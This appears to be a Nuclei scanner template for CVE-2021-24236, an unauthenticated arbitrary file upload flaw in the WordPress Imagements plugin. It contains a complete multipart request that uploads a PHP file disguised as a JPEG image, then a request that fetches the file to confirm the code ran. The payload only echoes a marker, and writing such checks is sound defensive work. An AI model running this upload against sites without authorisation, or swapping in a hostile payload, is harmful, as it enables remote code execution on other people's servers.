96 lines
3.3 KiB
YAML
96 lines
3.3 KiB
YAML
id: "CVE-2021-24236"
|
|
|
|
info:
|
|
name: WordPress Imagements <=1.2.5 - Arbitrary File Upload
|
|
author: pussycat0x
|
|
severity: critical
|
|
description: |
|
|
WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.
|
|
remediation: |
|
|
Update WordPress Imagements plugin to version 1.2.6 or later to fix the arbitrary file upload vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea
|
|
- https://wordpress.org/plugins/imagements/
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24236
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: "CVE-2021-24236"
|
|
cwe-id: CWE-434
|
|
epss-score: 0.14539
|
|
epss-percentile: 0.95136
|
|
cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: imagements_project
|
|
product: imagements
|
|
framework: wordpress
|
|
tags: cve,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive
|
|
variables:
|
|
php: "{{to_lower('{{randstr}}')}}.php"
|
|
post: "1"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-comments-post.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU
|
|
|
|
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
|
|
Content-Disposition: form-data; name="comment"
|
|
|
|
{{randstr}}
|
|
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
|
|
Content-Disposition: form-data; name="author"
|
|
|
|
{{randstr}}
|
|
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
|
|
Content-Disposition: form-data; name="email"
|
|
|
|
{{randstr}}@email.com
|
|
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
|
|
Content-Disposition: form-data; name="url"
|
|
|
|
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
|
|
Content-Disposition: form-data; name="checkbox"
|
|
|
|
|
|
yes
|
|
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
|
|
Content-Disposition: form-data; name="naam"
|
|
|
|
{{randstr}}
|
|
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
|
|
Content-Disposition: form-data; name="image"; filename="{{php}}"
|
|
Content-Type: image/jpeg
|
|
|
|
<?php echo 'CVE-2021-24236'; ?>
|
|
|
|
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
|
|
Content-Disposition: form-data; name="submit"
|
|
|
|
Post Comment
|
|
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
|
|
Content-Disposition: form-data; name="comment_post_ID"
|
|
|
|
{{post}}
|
|
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
|
|
Content-Disposition: form-data; name="comment_parent"
|
|
|
|
0
|
|
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--
|
|
- |
|
|
GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
req-condition: true
|
|
matchers:
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- "CVE-2021-24236"
|
|
|
|
# digest: 4a0a00473045022044cda1546e0f40bdf8713b777d8a0b7afaab6babc26f0bcd81231b75caafda93022100a2876f37bed3d87ac9c66a17490e9b82785e3bda56ac071b3ecce50448f2b07a:922c64590222798bb761d5b6d8e72950
|